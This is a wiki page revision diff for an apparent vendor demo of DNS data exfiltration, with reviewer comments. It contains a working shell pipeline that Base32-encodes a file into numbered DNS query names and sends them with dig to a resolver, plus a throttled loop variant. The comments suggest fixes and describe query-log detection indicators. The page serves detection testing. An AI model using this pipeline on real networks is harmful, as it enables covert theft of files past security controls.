dns:dns_exfiltration

dns:dns_exfiltration [2023/06/08 09:21] – [Simple Exfiltration] bstafford
dns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
 ===== Simple Exfiltration ===== ===== Simple Exfiltration =====
 Note that the BIND logs will be approximately 17 times the size of the transferred file. Note that the BIND logs will be approximately 17 times the size of the transferred file.
-<code> + 
-# File to be exfiltrated+Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 
 +<code># File to be exfiltrated
 SOURCE=/home/name/dns_exfil_test/file.pdf SOURCE=/home/name/dns_exfil_test/file.pdf
  
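Review bot: the new Base64 section gives "'normal' DNS doesn't use these" as the only reason to avoid Base64, which is too vague to act on; it should state that `=`, `/` and `+` are outside the hostname character set (letters, digits and hyphen), so any of them appearing in a queried name is an unambiguous indicator a query-log rule can key on, and that DNS names are compared case-insensitively (resolvers may rewrite label case in transit), which is the technical reason a case-sensitive alphabet is unreliable and a case-insensitive one like Base32 is preferred. The added "two scripts" note also says the auth-server commands "decrypt the logs" while the variables are named `ENCRYPTED`/`DECRYPTEDOUTPUT`: Base32 is an encoding, not encryption, and anyone reading the BIND query log should expect plainly decodable labels, so "decode" is the accurate word. The two trailing empty `+` lines after that paragraph are a style nit and can be dropped.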
Line 17: Line 24:
  
 # sub-domain off SLD that we change for every file # sub-domain off SLD that we change for every file
-SUBDOM=nw+SUBDOM=asdf
  
 # Target DNS server (e.g. NIOS with DFP or BloxOne Host) # Target DNS server (e.g. NIOS with DFP or BloxOne Host)
-LOCALDNS=192.168.11.154+# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100
  
-# Log file that the DNS queries can be found in on the authoratative DNS server +# Log file that the DNS queries can be found in on the authoritative DNS server 
-BIND_LOG_FILE=/var/log/named/query.log]+BIND_LOG_FILE=/var/log/named/query.log
  
-# File to put the decrypted, received file into (should be a replicat of SOURCE)+# File to put the decrypted, received file into (should be a replica of SOURCE)
 DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
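Review bot: leaving `#LOCALDNS=192.168.11.154` commented out directly above the new `LOCALDNS=52.119.41.100`, with the comment "Public IP is the BloxOne Threat Defense IP address" attached to neither line, makes it unclear which resolver is meant for which setup; either say explicitly "internal NIOS/DFP forwarder on the first line, BloxOne Threat Defense on the second" or remove the stale line. The removal of the trailing `]` from `BIND_LOG_FILE=/var/log/named/query.log` is a real fix rather than a cosmetic one: the earlier value would have been used verbatim as the log path by the decode step on the authoritative server and it would have read the wrong file, so it deserves a mention in the revision summary alongside the spelling corrections.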
Line 35: Line 44:
 # Then replace the whitespace at the start of each line with nothing (i.e remove it) # Then replace the whitespace at the start of each line with nothing (i.e remove it)
 # Then replace the TAB between the number and domain with a "." # Then replace the TAB between the number and domain with a "."
-base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED+base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED
  
-# The result is a file that contains a hugh list of FQDN's for us to query (exfiltrate)+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
  
-Use DIG to iterate over the file and resolve the DNS at full speed.+Exfiltrate the file with DIG.
 dig +short A @$LOCALDNS -f $ENCRYPTED dig +short A @$LOCALDNS -f $ENCRYPTED
- 
-# OR - if you want to add a delay into the exfiltration, use the following line. 
-# for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep ;done 
  
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
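Review bot: `Exfiltrate the file with DIG.` (like the `Use DIG to iterate over the file...` line it replaces) is an uncommented prose line inside the `<code>` block, so running the file as a script will try to execute it as a command and fail before reaching `dig`; it needs a leading `#` like the surrounding comments. In the same pipeline, `sed s/^' '*//g` is only partly quoted and relies on shell concatenation to form the pattern; `sed 's/^ *//'` says the same thing unambiguously. The relocated delay loop is now correct where the old one was not: `sleep ;` with no argument errors out, and `sleep 0.1` fixes that. Worth noting in the comment for whoever reviews the auth-server side: because `nl` prepends the line number as the first label, every query in the BIND query log for this run will be an incrementing integer followed by a fixed-width Base32 label under the same `$SUBDOM.$DOMAIN`, which is exactly the shape a query-log detection rule or the 17x log-volume note at the top of the section refers to.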
dns/dns_exfiltration.1686216108.txt.gz · Last modified: by bstafford